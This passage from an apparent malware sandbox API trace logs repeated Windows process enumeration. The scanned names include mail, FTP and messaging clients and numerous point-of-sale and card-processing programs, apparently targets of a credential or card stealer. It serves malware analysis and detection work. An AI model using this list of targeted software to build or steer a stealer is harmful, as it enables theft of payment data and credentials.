lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0234.947] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0234.948] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0234.953] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0234.954] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0234.956] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0234.958] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0234.960] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0234.961] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0234.963] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0234.964] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0235.018] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0235.020] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0235.021] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0235.023] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0235.025] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0235.026] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0235.030] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0235.032] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0235.034] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0235.035] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0235.037] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0235.038] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0235.040] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0235.042] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0235.043] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0235.047] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0235.049] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0235.050] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0235.052] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0235.053] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.055] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.056] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.058] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.123] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0235.125] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0235.126] CloseHandle (hObject=0x17b0) returned 1 [0235.126] Sleep (dwMilliseconds=0x64) [0235.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0235.292] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.294] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x78, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.296] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.297] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.299] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.300] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.302] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.303] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.305] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.306] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.308] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.309] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.310] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.312] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.313] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.315] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.316] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.318] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.319] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.320] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.322] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0235.323] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0235.340] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.342] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.343] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0235.345] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0235.346] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0235.348] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.349] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0235.350] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0235.352] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.353] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.355] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0235.356] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0235.358] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0235.359] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0235.360] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0235.362] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0235.363] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0235.365] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0235.366] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0235.367] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0235.369] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0235.370] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0235.407] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0235.408] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0235.410] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 